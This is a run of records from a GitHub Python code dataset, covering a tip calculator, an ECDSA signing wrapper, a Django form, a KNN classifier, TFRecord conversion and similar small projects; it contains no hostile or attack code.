curve is in sequential order\n # %timeit says that doing the ordering in Python is faster than\n # including an 'ORDER BY time' flag in the MySQL search.\n # I have no idea why, but I'll keep doing the ordering here.\n order = np.argsort(times)\n times = times[order]\n fluxes = fluxes[order]\n flux_errs = flux_errs[order]\n flags = flags[order]\n cadences = cadences[order]\n quarters = quarters[order]\n\n return times, fluxes, flux_errs, cadences, quarters, flags.astype(int)\n","repo_name":"jadilia/decatur","sub_path":"decatur/kepler_data.py","file_name":"kepler_data.py","file_ext":"py","file_size_in_byte":9218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14972393325","text":"#If the bill was $150.00, split between 5 people, with 12% tip. \n\n#Each person should pay (150.00 / 5) * 1.12 = 33.6\n#Format the result to 2 decimal places = 33.60\n\n#Tip: There are 2 ways to round a number. You might have to do some Googling to solve this.💪\n\n#Write your code below this line 👇\n\n#Welcome the user\nprint(\"Welcome to the tip calculator!\\n\")\n\n#Gather the input\ntotal_bill=input(\"What was your total bill? $\")\n\n#typecast to float\nnew_total_bill=float(total_bill)\n\n#find the amount of tip to be given\ntip=int(input(\"What percentage tip would you like to give? 10, 12 or 15? \"))\n\n#find the number of people to split the bill\npeople=int(input(\"How many people want to split the bill? 
\"))\n\n\n#find the percentage tip and the amount to be split\nvalue_of_tip=(tip/100) + 1\nnew_total=new_total_bill* value_of_tip\nresult=new_total/people\nround_result = \"{:.2f}\".format(result)\nprint(f\"Each person should pay: ${round_result}\")","repo_name":"james-taban/TIP-CALCULATOR","sub_path":"TipCalculator (1).py","file_name":"TipCalculator (1).py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14365779537","text":"\r\ndef distForm():\r\n #stores values of point\r\n x1 = float(input(\"Enter the x: \"))\r\n y1 = float(input(\"Enter the y: \"))\r\n z1 = float(input(\"Enter the z: \"))\r\n #value of centroid, change as needed\r\n cx = 1.966\r\n cy = 9.866\r\n cz = 17.366\r\n #parts of distance formula\r\n dp1 = pow((cx - x1), 2)\r\n dp2 = pow((cy - y1), 2)\r\n dp3 = pow((cz - z1), 2)\r\n #returns distance formula results\r\n return dp1+dp2+dp3\r\ndef calAvg():\r\n num = int(input(\" how many points are there\"))\r\n Sum = 0\r\n for x in range(num):\r\n Sum += float(input(\"enter distance: \")) \r\n return Sum/num\r\n\r\n#print(calAvg())\r\n#for x in range(6):\r\nprint(distForm())\r\n \r\n","repo_name":"TechPointYT/randoStuff","sub_path":"homework 2 script.py","file_name":"homework 2 script.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2018782","text":"from .coding import SDNML\n\n\nclass Finder(object):\n def __init__(self, discounting_param=0.1, order=2, smoothing=10,\n code_length_class='sdnml'):\n self.discounting_param = discounting_param\n self.order = order\n self.smoothing = smoothing\n if code_length_class == 'sdnml':\n self.first_code_length = SDNML(\n discounting_param=discounting_param,\n order=order)\n self.second_code_length = SDNML(\n discounting_param=discounting_param,\n order=order)\n else:\n raise ValueError(\"Unknown code-length class {:s}\".format(\n code_length_class))\n self._first_score_queue = [0 for _ in range(smoothing)]\n self._second_score_queue = [0 for _ in range(smoothing)]\n\n def score_one(self, x):\n \"\"\"Calculate a change score.\n\n Parameters\n ----------\n x : float\n The sample you want to calculate the change score.\n\n Returns\n -------\n score : float\n Change score of the sample.\n \"\"\"\n self._first_score_queue.pop(0)\n self._first_score_queue.append(self.first_code_length.length(x))\n first_smoothed = sum(self._first_score_queue)/self.smoothing\n self._second_score_queue.pop(0)\n self._second_score_queue.append(\n self.second_code_length.length(first_smoothed))\n score = sum(self._second_score_queue)/self.smoothing\n return score\n\n def score(self, X):\n \"\"\"Calculate change scores.\n\n Parameters\n ----------\n X : array-like, shape (1, n_samples)\n Sequence of the samples.\n\n Returns\n -------\n scores : iterator shale(n_samples)\n Change scores of the individuale samples.\n \"\"\"\n for x in X:\n yield self.score_one(x)\n","repo_name":"hana-day/rtchange","sub_path":"rtchange/finder.py","file_name":"finder.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"20612271541","text":"import six\nimport tensorflow as tf\nfrom nvidia_tao_tf1.cv.common.dataio.data_converter import DataConverter, TfRecordType\n\n\nclass CustomDataConverter(DataConverter):\n \"\"\"Converts a dataset to TFRecords.\"\"\"\n\n feature_to_type = {\n 
'train/image_frame_name' : TfRecordType.BYTES,\n 'train/image_frame_width' : TfRecordType.INT64,\n 'train/image_frame_height' : TfRecordType.INT64,\n 'train/facebbx_x' : TfRecordType.INT64,\n 'train/facebbx_y' : TfRecordType.INT64,\n 'train/facebbx_w' : TfRecordType.INT64,\n 'train/facebbx_h' : TfRecordType.INT64,\n 'train/lefteyebbx_x' : TfRecordType.INT64,\n 'train/lefteyebbx_y' : TfRecordType.INT64,\n 'train/lefteyebbx_w' : TfRecordType.INT64,\n 'train/lefteyebbx_h' : TfRecordType.INT64,\n 'train/righteyebbx_x' : TfRecordType.INT64,\n 'train/righteyebbx_y' : TfRecordType.INT64,\n 'train/righteyebbx_w' : TfRecordType.INT64,\n 'train/righteyebbx_h' : TfRecordType.INT64,\n 'train/landmarks' : TfRecordType.DTYPE_FLOAT,\n 'train/landmarks_occ' : TfRecordType.DTYPE_INT64,\n 'label/left_eye_status' : TfRecordType.BYTES,\n 'label/right_eye_status' : TfRecordType.BYTES,\n 'train/num_keypoints' : TfRecordType.INT64,\n 'train/tight_facebbx_x1' : TfRecordType.INT64,\n 'train/tight_facebbx_y1' : TfRecordType.INT64,\n 'train/tight_facebbx_x2' : TfRecordType.INT64,\n 'train/tight_facebbx_y2' : TfRecordType.INT64,\n 'label/hp_pitch': TfRecordType.FLOAT, # Degrees\n 'label/hp_yaw': TfRecordType.FLOAT, # Degrees\n 'label/hp_roll': TfRecordType.FLOAT, # Degrees\n 'label/theta': TfRecordType.FLOAT, # Radians\n 'label/phi': TfRecordType.FLOAT, # Radians\n 'label/mid_cam_x': TfRecordType.FLOAT, # Mid eye center - x\n 'label/mid_cam_y': TfRecordType.FLOAT, # Mid eye center - y\n 'label/mid_cam_z': TfRecordType.FLOAT, # Mid eye center - z\n 'label/lpc_cam_x': TfRecordType.FLOAT, # Left eye center - x\n 'label/lpc_cam_y': TfRecordType.FLOAT, # Left eye center - y\n 'label/lpc_cam_z': TfRecordType.FLOAT, # Left eye center - z\n 'label/rpc_cam_x': TfRecordType.FLOAT, # Right eye center - x\n 'label/rpc_cam_y': TfRecordType.FLOAT, # Right eye center - y\n 'label/rpc_cam_z': TfRecordType.FLOAT, # Right eye center - z\n 'train/valid_theta_phi' : TfRecordType.INT64, # 1 if valid, 0 otherwise\n 'label/theta_le' : TfRecordType.FLOAT, # In radians\n 'label/phi_le' : TfRecordType.FLOAT, # In radians\n 'label/theta_re' : TfRecordType.FLOAT, # In radians\n 'label/phi_re' : TfRecordType.FLOAT, # In radians\n 'label/theta_mid' : TfRecordType.FLOAT, # In radians\n 'label/phi_mid' : TfRecordType.FLOAT, # In radians\n 'label/head_pose_theta' : TfRecordType.FLOAT, # In radians\n 'label/head_pose_phi' : TfRecordType.FLOAT, # In radians\n 'train/eye_features' : TfRecordType.DTYPE_FLOAT,\n 'train/source' : TfRecordType.BYTES,\n 'train/num_eyes_detected': TfRecordType.INT64,\n 'train/norm_frame_path': TfRecordType.BYTES,\n 'label/norm_face_gaze_theta': TfRecordType.FLOAT, # In radians\n 'label/norm_face_gaze_phi': TfRecordType.FLOAT, # In radians\n 'label/norm_face_hp_theta': TfRecordType.FLOAT, # In radians\n 'label/norm_face_hp_phi': TfRecordType.FLOAT, # In radians\n 'label/norm_leye_gaze_theta': TfRecordType.FLOAT, # In radians\n 'label/norm_leye_gaze_phi': TfRecordType.FLOAT, # In radians\n 'label/norm_leye_hp_theta': TfRecordType.FLOAT, # In radians\n 'label/norm_leye_hp_phi': TfRecordType.FLOAT, # In radians\n 'label/norm_reye_gaze_theta': TfRecordType.FLOAT, # In radians\n 'label/norm_reye_gaze_phi': TfRecordType.FLOAT, # In radians\n 'label/norm_reye_hp_theta': TfRecordType.FLOAT, # In radians\n 'label/norm_reye_hp_phi': TfRecordType.FLOAT, # In radians\n 'train/norm_facebb_x': TfRecordType.INT64,\n 'train/norm_facebb_y': TfRecordType.INT64,\n 'train/norm_facebb_w': TfRecordType.INT64,\n 'train/norm_facebb_h': 
TfRecordType.INT64,\n        'train/norm_leyebb_x': TfRecordType.INT64,\n        'train/norm_leyebb_y': TfRecordType.INT64,\n        'train/norm_leyebb_w': TfRecordType.INT64,\n        'train/norm_leyebb_h': TfRecordType.INT64,\n        'train/norm_reyebb_x': TfRecordType.INT64,\n        'train/norm_reyebb_y': TfRecordType.INT64,\n        'train/norm_reyebb_w': TfRecordType.INT64,\n        'train/norm_reyebb_h': TfRecordType.INT64,\n        'train/norm_landmarks': TfRecordType.DTYPE_FLOAT,\n        'train/norm_per_oof': TfRecordType.FLOAT,\n        'train/landmarks_3D': TfRecordType.DTYPE_FLOAT\n    }\n\n    lm_pred_feature_to_type = {k : v for k, v in six.iteritems(feature_to_type)\n                               if 'lefteyebbx' not in k and\n                               'righteyebbx' not in k and\n                               'facebbx' not in k and\n                               'num_eyes_detected' not in k}\n\n    # Convert from enum type to read tfrecord type\n    enum_to_read_dict = {\n        TfRecordType.BYTES : tf.FixedLenFeature([], dtype=tf.string),\n        TfRecordType.FLOAT : tf.FixedLenFeature([], dtype=tf.float32),\n        TfRecordType.INT64 : tf.FixedLenFeature([], dtype=tf.int64),\n        TfRecordType.DTYPE_FLOAT : tf.VarLenFeature(tf.float32),\n        TfRecordType.DTYPE_INT64 : tf.VarLenFeature(tf.int64)\n    }\n\n    def __init__(self, use_lm_pred):\n        \"\"\"Initialize the feature mapping.\n\n        Args:\n            use_lm_pred (bool): True if using predicted landmarks.\n        \"\"\"\n\n        self._feature_to_type_dict = self.feature_to_type\n        if use_lm_pred:\n            self._feature_to_type_dict = self.lm_pred_feature_to_type\n\n    def generate_frame_tfrecords(self, frame_dict):\n        \"\"\"Convert the collected frame data dict into tfrecord examples.\n\n        Args:\n            frame_dict (dict): dictionary for frame information\n\n        Returns:\n            example_array (list): one tf.train.Example per frame\n        \"\"\"\n\n        example_array = []\n        for frame in frame_dict.keys():\n            frame_features = {}\n            frame_data_dict = frame_dict[frame]\n\n            for feature in self._feature_to_type_dict.keys():\n                self.write_feature(feature, frame_data_dict[feature], frame_features)\n            example = tf.train.Example(features=tf.train.Features(feature=frame_features))\n            example_array.append(example)\n\n        return example_array\n","repo_name":"NVIDIA/tao_tensorflow1_backend","sub_path":"nvidia_tao_tf1/cv/common/dataio/custom_data_converter.py","file_name":"custom_data_converter.py","file_ext":"py","file_size_in_byte":6798,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"}
{"seq_id":"19024560908","text":"# How many numbers 
are there whose reverse is present in the list\n# (1, 2, 3, 8, 9, 3, 2, 1) → 3\n# (1, 2, 1, 4) → 3\n# (7, 1, 2, 9, 7, 2, 1) → 2\nimport os\nos.system(\"cls\")\nx=[1, 2, 3, 8, 9, 3, 2, 1]\nreverse=len(x)\nfor i in range(0,len(x)-1):\n new_x=[]\n for j in range(0,reverse):\n new_x.append(x[j])\n new_x.reverse()\n c=0\n for j in range(0,len(x)-len(new_x)+1): \n for k in range(0,len(new_x)):\n if new_x[k]!=x[k]:\n c+=1\n break \n if c bool:\n if isinstance(message, str):\n message = bytes(message, 'utf-8')\n\n if isinstance(signature, str):\n signature = bytes.fromhex(signature)\n\n if self._mode == EcdsaModes.SECP256K1_KECCAK_256_ETHEREUM:\n message_hash = defunct_hash_message(message)\n try:\n signature_bytes_standard = to_standard_signature_bytes(\n signature)\n signature_obj = EthereumKeys.Signature(\n signature_bytes=signature_bytes_standard)\n obtained_public_value = signature_obj.recover_public_key_from_msg_hash(\n message_hash).to_bytes()\n if obtained_public_value != self._public_bytes:\n raise eth_keys_exceptions.BadSignature\n except (ValueError, eth_keys_exceptions.BadSignature):\n raise InvalidSignatureError\n\n else:\n hash_function = '_'.join(self._mode.split('_')[1:]).lower()\n message_hash = hash_message(message, hash_function)\n try:\n self._public_key_object.verify(\n signature, message_hash,\n ec.ECDSA(getattr(hashes, hash_function.upper())()))\n except cryptography_exceptions.InvalidSignature:\n raise InvalidSignatureError\n\n def _load_public_value(self, key):\n if self._key_format == EcdsaFormats.RAW_VALUE:\n if isinstance(key, str):\n key = bytes.fromhex(key)\n self._public_bytes = key\n else:\n raise ValueError\n self._load_public_key()\n\n def _load_public_key(self):\n if self._mode != EcdsaModes.SECP256K1_KECCAK_256_ETHEREUM:\n self._public_key_object = ec.EllipticCurvePublicKey.from_encoded_point(\n self._eliptic_curve,\n b'\\x04' + self._public_bytes,\n )\n\n self._public_value = {\n 'x': big_endian_to_int(self._public_bytes[:32]),\n 'y': big_endian_to_int(self._public_bytes[32:]),\n }\n\n\nclass EcdsaPrivateKey(PrivateKeyInterface):\n def __init__(\n self,\n filepath: str = None,\n password: str = None,\n mode: str = None,\n key_format: str = None,\n key=None,\n ):\n self._private_value = None\n self._private_key_object = None\n self._public_key_object = None\n\n if mode not in EcdsaModes.options():\n raise ValueError\n self._mode = mode\n self._eliptic_curve = getattr(ec, self._mode.split('_')[0])()\n\n if key is None and filepath is None:\n self._generate_private_value()\n return\n\n if key_format is None:\n key_format = EcdsaFormats.RAW_VALUE\n if key_format not in EcdsaFormats.options():\n raise ValueError\n self._key_format = key_format\n\n if key is not None:\n self._load_private_value(key, password)\n\n elif filepath is not None:\n self._load_private_key_from_file(filepath, password)\n\n @property\n def public_key(self):\n return self._public_key_object\n\n @property\n def private_value(self):\n return self._private_value\n\n @property\n def private_bytes(self):\n return int_to_big_endian(self.private_value)\n\n @property\n def private_value_base64(self):\n return base64.b64encode(self.private_bytes).decode('ascii')\n\n @property\n def private_value_hex(self):\n return self.private_bytes.hex()\n\n def get_ethereum_account(self, password: str = None):\n password = password if password is not None else ''\n return EthereumAccount.encrypt(self._private_value, password)\n\n def sign(self, message) -> bytes:\n if isinstance(message, str):\n message = 
bytes(message, 'utf-8')\n\n        if not isinstance(message, bytes):\n            raise ValueError\n\n        if self._mode == EcdsaModes.SECP256K1_KECCAK_256_ETHEREUM:\n            message_hash = defunct_hash_message(message)\n            (_, _, _, signature) = sign_message_hash(self._private_key_object,\n                                                     message_hash)\n\n        else:\n            hash_function = '_'.join(self._mode.split('_')[1:]).lower()\n            message_hash = hash_message(message, hash_function)\n            signature = self._private_key_object.sign(\n                message_hash,\n                ec.ECDSA(getattr(hashes, hash_function.upper())()),\n            )\n        return signature\n\n    def _generate_private_value(self):\n        self._private_value = ec.generate_private_key(\n            self._eliptic_curve).private_numbers().private_value\n        self._load_private_key()\n\n    def _load_private_value(self, key, password: str = None):\n        if self._key_format == EcdsaFormats.ETHEREUM_JSON:\n            if not isinstance(key, dict):\n                key = json.loads(key)\n            private_value = bytes(EthereumAccount.decrypt(key, password))\n            self._private_value = big_endian_to_int(private_value)\n        elif self._key_format == EcdsaFormats.RAW_VALUE:\n            if isinstance(key, bytes):\n                key = big_endian_to_int(key)\n            if not isinstance(key, int):\n                raise ValueError(f'{type(key)} is not int')\n            self._private_value = key\n        else:\n            raise ValueError\n        self._load_private_key()\n\n    def _load_private_key(self):\n        if self._mode == EcdsaModes.SECP256K1_KECCAK_256_ETHEREUM:\n            self._private_key_object = EthereumKeys.PrivateKey(\n                int_to_big_endian(self._private_value))\n            public_bytes = self._private_key_object.public_key.to_bytes()\n            self._public_key_object = EcdsaPublicKey(\n                key=public_bytes,\n                mode=self._mode,\n                key_format=EcdsaFormats.RAW_VALUE,\n            )\n        else:\n            self._private_key_object = ec.derive_private_key(\n                self._private_value, self._eliptic_curve)\n            public_numbers = self._private_key_object.public_key(\n            ).public_numbers()\n            public_bytes = int_to_big_endian(public_numbers.x) \\\n                + int_to_big_endian(public_numbers.y)\n            self._public_key_object = EcdsaPublicKey(\n                key=public_bytes,\n                mode=self._mode,\n                key_format=EcdsaFormats.RAW_VALUE,\n            )\n\n    def _load_private_key_from_file(self, filepath: str, password: str):\n        with open(filepath, 'rb') as input_file:\n            data = input_file.read()\n        self._load_private_value(data, password)\n","repo_name":"labteral/digsig","sub_path":"digsig/ecdsa.py","file_name":"ecdsa.py","file_ext":"py","file_size_in_byte":8823,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"25816757155","text":"from django.contrib.auth.forms import UserCreationForm\nfrom django import forms\nfrom django.contrib.auth.models import User\nfrom .models import Profile\n\n#extends the UserCreationForm so it includes the Email field\n#It also validates the content of the entered Email\nclass UserCreationformWithEmail(UserCreationForm):\n    email = forms.EmailField (required=True, help_text= \"Ingrese su Email. 
254 caracteres como máximo y deben ser valido\")\n\n    class Meta:\n        model = User\n        fields = ('username','password1','password2','email')\n    \n    #allows validating the existence of duplicate Emails\n    def clean_email(self):\n        email = self.cleaned_data.get(\"email\")#retrieve the field we are going to validate\n        if User.objects.filter(email=email).exists():#check whether a duplicate Email already exists\n            raise forms.ValidationError(\"Ya existen usuarios registrados con este Email, ingrese otro\")\n        return email\n\n#form for entering profile data\nclass ProfileForm (forms.ModelForm):\n    class Meta:\n        model = Profile\n        fields = ['avatar', 'bio', 'link']\n        widgets = {\n            'avatar':forms.ClearableFileInput(attrs={'class':'form-control-file mt-3'}),\n            'bio':forms.Textarea(attrs={'class':'form-control mt-3', 'rows':3, 'placeholder':'Biografía'}),\n            'link':forms.URLInput(attrs={'class':'form-control mt-3', 'placeholder':'Enlace'}),\n        }\n#allows editing the email\nclass EmailForm(forms.ModelForm):\n    email = forms.EmailField (required=True, help_text= \"Ingrese su Email. 254 caracteres como máximo y deben ser valido\")\n    \n    class Meta:\n        model = User\n        fields = ['email']\n\n    def clean_email(self):\n        email = self.cleaned_data.get(\"email\")#retrieve the field we are going to validate\n        if 'email' in self.changed_data:#check whether an email is already stored and whether it was changed\n            if User.objects.filter(email=email).exists():#check whether a duplicate Email already exists\n                raise forms.ValidationError(\"Ya existen usuarios registrados con este Email, ingrese otro\")\n        return email\n","repo_name":"ramacualquiercosa/PIG_G3_22816","sub_path":"PIG_G3_22816/registration/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"43190896828","text":"#coding: utf-8\n\n# A regular expression can be passed as any argument of a BeautifulSoup call,\n# which makes locating your target elements extremely flexible\nfrom urllib.request import urlopen\nfrom urllib.error import HTTPError\nfrom bs4 import BeautifulSoup\nimport re\n\ntry:\n    html = urlopen('http://www.pythonscraping.com/pages/page3.html')\nexcept HTTPError as e:\n    print('url is not found!')\nelse:\n    if html is None:\n        print('url is None!')\n    else:\n        bsObj = BeautifulSoup(html)\n\n        # Note how many product images there are on the page -- their source code looks like this:\n        # \n        images = bsObj.findAll(\"img\", {\"src\": re.compile(\"\\.\\.\\/img\\/gifts/img.*\\.jpg\")})\n        for image in images:\n            print(image[\"src\"])","repo_name":"Vencenter/Python_example","sub_path":"python开发案例/python网络数据采集/复杂html解析/正则表达式/re_test.py","file_name":"re_test.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"}
{"seq_id":"16952133796","text":"import random\nimport time\n\ntime.time()\n\nwaitingRoom=[]\n\ntriageRoom=[]\n\npatients=[\"bobby\",\"tom\",\"harold\",\"jenny\",\"bruce\",\\\n          \"stephane\",\"george\",\"thomas\",\"bowie\",\"grant\",\\\n          \"kimber\",\"lucas\",\"jonah\",\"joey\",\"monica\"]\n\nexamRoom=[]\n\ndef callNurse():\n    triageRoom.append(waitingRoom.pop(0))\n\n\nclass patient:\n    \n    def __init__(self):\n        self.name=random.choice(patients)+\" \"+random.choice(patients)\n        self.pos=\"waiting room\"\n        self.visitTime = int(random.randrange(15,20))\n    \n\n    def __str__(self):\n        return self.name\n\ndef simulate():\n\n    minute=1 \n\n    for i in range(20):\n        p = patient()\n        waitingRoom.append(p)\n    \n    while True:\n        \n        if len(waitingRoom) > 0:\n            callNurse()\n        \n        if len(triageRoom)>0:\n            if len(examRoom)<6:\n                try:\n                    
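# move the next triaged patient into an open exam room\n                    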
examRoom.append(triageRoom.pop(0))\n except IndexError:\n break\n \n else:\n print(\"examRoom is filled or empty\")\n\n for pat in examRoom:\n pat.visitTime -=1\n print(pat.name,pat.visitTime)\n if pat.visitTime ==0:\n examRoom.remove(pat)\n print(\"minute\"+\" \"+str(minute))\n print(\" \")\n\n minute=minute+1\n\n if len(waitingRoom)==0 and len(triageRoom)==0 and len(examRoom)==0:\n break\n \n\n \nsimulate()\n","repo_name":"Alexmallick/data-structures-HW","sub_path":"lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13917216661","text":"_base_ = ['./text-detection_static.py', '../../_base_/backends/tensorrt.py']\nonnx_config = dict(\n output_names=['dets', 'labels', 'masks'],\n dynamic_axes=dict(\n input=dict({\n 0: 'batch',\n 2: 'height',\n 3: 'width'\n }),\n dets=dict({\n 0: 'batch',\n 1: 'num_dets'\n }),\n labels=dict({\n 0: 'batch',\n 1: 'num_dets'\n }),\n masks=dict({\n 0: 'batch',\n 1: 'num_dets',\n 2: 'height',\n 3: 'width'\n })))\n\nbackend_config = dict(\n common_config=dict(max_workspace_size=1 << 30),\n model_inputs=[\n dict(\n input_shapes=dict(\n input=dict(\n min_shape=[1, 3, 320, 320],\n opt_shape=[1, 3, 600, 800],\n max_shape=[1, 3, 2240, 2240])))\n ])\n\ncodebase_config = dict(\n post_processing=dict(\n score_threshold=0.05,\n confidence_threshold=0.005,\n iou_threshold=0.5,\n max_output_boxes_per_class=200,\n pre_top_k=5000,\n keep_top_k=100,\n background_label_id=-1,\n export_postprocess_mask=False))\n","repo_name":"open-mmlab/mmdeploy","sub_path":"configs/mmocr/text-detection/text-detection_mrcnn_tensorrt_dynamic-320x320-2240x2240.py","file_name":"text-detection_mrcnn_tensorrt_dynamic-320x320-2240x2240.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":2256,"dataset":"github-code","pt":"53"} +{"seq_id":"14817016243","text":"import cv2\nimport numpy as np\n\ndef AlphaBlend(img1, img2, alpha):\n\n blendS = img1 * alpha + img2 * (1. 
- alpha)\n\n return blendS\n\nimg1 = cv2.imread(\"../imori.jpg\").astype(np.float)\nimg2 = cv2.imread(\"../thorino.jpg\").astype(np.float)\n\nblendS = AlphaBlend(img1, img2, 0.6)\nblendS = blendS.astype(np.uint8)\n\ncv2.imwrite(\"myans_60.jpg\", blendS)\ncv2.imshow(\"result\", blendS)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"OverHall27/Gasyori100knock","sub_path":"Question_51_60/myanswers/myans_60.py","file_name":"myans_60.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28519461981","text":"import joblib\nimport numpy as np\n\n\nclass KNeighborsClassifier:\n def __init__(self, n_neighbors: int = 1):\n self.n_neighbors = n_neighbors\n\n self.classes = {}\n self.__uuid_classes: np.ndarray = None\n\n self._last_class_id = 0\n self._X: np.ndarray = None\n self._y: np.ndarray = None\n\n self.fitted = False\n\n @classmethod\n def from_file(cls, file_path):\n return joblib.load(file_path)\n\n def partial_fit(self, X, y):\n _y = np.empty(y.shape, dtype=np.int)\n _y_counts = np.empty(y.shape, dtype=np.int)\n for i, cls in enumerate(y):\n class_info = self.classes.setdefault(cls, np.array([self._last_class_id, 0], dtype='int64'))\n class_info[1] += 1\n class_id, class_count = class_info\n _y[i] = class_id\n _y_counts[i] = class_count\n if class_id == self._last_class_id:\n if self.__uuid_classes is None:\n self.__uuid_classes = np.array([cls], dtype='S36')\n else:\n self.__uuid_classes = self._extend(self.__uuid_classes, [cls])\n self._last_class_id += 1\n if self._y is None:\n self._y = np.array(_y)\n else:\n self._y = self._extend(self._y, _y)\n if self._X is None:\n self._X = np.array(X)\n else:\n self._X = self._extend(self._X, X)\n self.fitted = True\n\n return _y_counts\n\n def __calc_distances(self, X):\n distances = np.empty(self._y.shape, dtype=np.float)\n\n for i in range(self._y.shape[0]):\n distances[i] = self.distance(self._X[i], X)\n\n return distances\n\n def predict(self, X):\n if not self.fitted:\n return np.array([]), np.array([])\n\n return self._predict(X)\n\n def predict_on_batch(self, X):\n if not self.fitted:\n return np.array([]), np.array([])\n\n distances = np.empty(X.shape[0], dtype=np.float32)\n uuidx = np.empty(X.shape[0], dtype='S36')\n\n for i, x in enumerate(X):\n distances[i], uuidx[i] = self._predict(x)\n\n return distances, uuidx\n\n def _predict(self, X):\n distances = self.__calc_distances(X)\n\n if self.n_neighbors == 1:\n min_idx = np.argmin(distances)\n predicted_class_id = self._y[min_idx]\n distance = distances[min_idx]\n else:\n min_idx = np.argpartition(distances, self.n_neighbors)[:self.n_neighbors]\n y_min = self._y[min_idx]\n cls, counts = np.unique(y_min, return_counts=True)\n argmax = np.argmax(counts)\n predicted_class_id = cls[argmax]\n distance = distances[predicted_class_id]\n\n return distance, self.__uuid_classes[predicted_class_id]\n\n def kneighbors(self, X, n_neighbors=None):\n distances = self.__calc_distances(X)\n if n_neighbors:\n min_idx = np.argpartition(distances, n_neighbors)[:n_neighbors]\n neighbors = sorted(zip(distances[min_idx], min_idx), key=lambda x: x[0])\n neighbors_distances = np.fromiter((n[0] for n in neighbors), dtype=np.float64)\n neighbors_classes = self._y[[n[1] for n in neighbors]]\n neighbors_uuid = self.__uuid_classes[neighbors_classes]\n else:\n idx = np.argsort(distances)\n neighbors_distances = distances[idx]\n neighbors_classes = self._y[idx]\n neighbors_uuid = 
self.__uuid_classes[neighbors_classes]\n\n        return neighbors_distances, neighbors_uuid\n\n    def save(self, file_name='knn_classifier.pkl'):\n        joblib.dump(self, file_name)\n\n    def uuid_in_classes(self, uuid):\n        return uuid in self.__uuid_classes\n\n    @staticmethod\n    def _extend(arr, values):\n        shape = arr.shape\n        new_shape = shape[0] + len(values), *shape[1:]\n        x = np.resize(arr, new_shape)\n        for i in range(shape[0], new_shape[0]):\n            # copy the appended values in order, starting at the first element\n            if len(shape) == 2:\n                x[i, :] = values[i - shape[0]]\n            else:\n                x[i] = values[i - shape[0]]\n        return x\n\n    @staticmethod\n    def distance(a, b):\n        return np.sqrt(np.sum((a - b) ** 2))\n","repo_name":"vQuadX/face-recognition-server","sub_path":"classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"}
{"seq_id":"41512538688","text":"# -*- encoding: utf-8 -*-\n\nimport abjad\nfrom calliope import bubbles\nfrom copper import machines\nfrom copper.machines.tools import IndexedData as ID, ID1 # just to avoid a lot of typing\nfrom copper.generations.gen_e import gen_e\nfrom copper import staves\n\nclass GenF(machines.RhythmsPulsed):\n    time_signature = (4,4)\n    metrical_durations = ID(default=((4,4),), limit=36)\n    rehearsal_mark_number = 6\n    rhythm_initial_silence = 27\n    tempo_command = '\\\\note #\"2.\" #1 = \\\\note #\"1\" #1 (\\\\note #\"4\" #1 = 144)'\n    start_bar_line = \"||\"\n    respell = None\n    def update_data(self, **kwargs):\n        super().update_data(**kwargs)\n        # self.respell_events(\"flats\", 1, 42)\n        # self.respell_events(\"sharps\", 44)\n\nclass Drone0(GenF, machines.Drone0):\n    rhythm_initial_silence=2\n\nclass Drone10(Drone0):\n    # show_data_attr=\"original_depthwise_index\"\n    rhythm_initial_silence=2\n    rhythm_segments = (\n        # NOTE... include others here?\n        (1,1,1,1,),\n        )\n    rhythm_sequence = ID({\n        # NOTE: could cycle through a few possibilities\n        }, default=0, limit=36)\n    pitch_sequence = ID(default=0, limit=34)\n    \n    def update_data(self, **kwargs):\n        machines.ArrangeAttachments.update_data(self, **kwargs)\n        if self.__class__.__name__ == \"Drone10\":\n            self.tag_events(\"grey\", every_child=True)\n\n# -------------------------------------------------------------------------------------------------\n\nclass Line3(GenF, gen_e.Line4):\n    # rhythm_reverse = list(gen_e.Line4.rhythm_reverse)\n    # rhythm_reverse.remove(7)\n    rhythm_initial_silence=23\n    pitch_reverse = gen_e.Line4.pitch_reverse + (19,25)\n    # show_data_type=machines.EventData\n    pitch_displacement = machines.FifthDisplacement(\n        up=( 6,7, 19,20, 22, 24, 26, 30, 58,76),\n        down=(2,4, 8,9,12, 16, 18, 21, )\n        ) +\\\n        machines.OctaveDisplacement(\n            up=(1,3,4,9, 12, 16, 21),\n            down=(5,7, 11, 19, 22, 26)\n            ) \n    breaks = gen_e.Line4.breaks + ID({\n        1:5,\n        3:1,\n        10:-4,\n        11:0,\n        13:-1,\n        19:-2,\n        25:-1,\n        26:1,\n        })\n    rhythm_times = 3 # NOTE... 3rd time cuts off... 
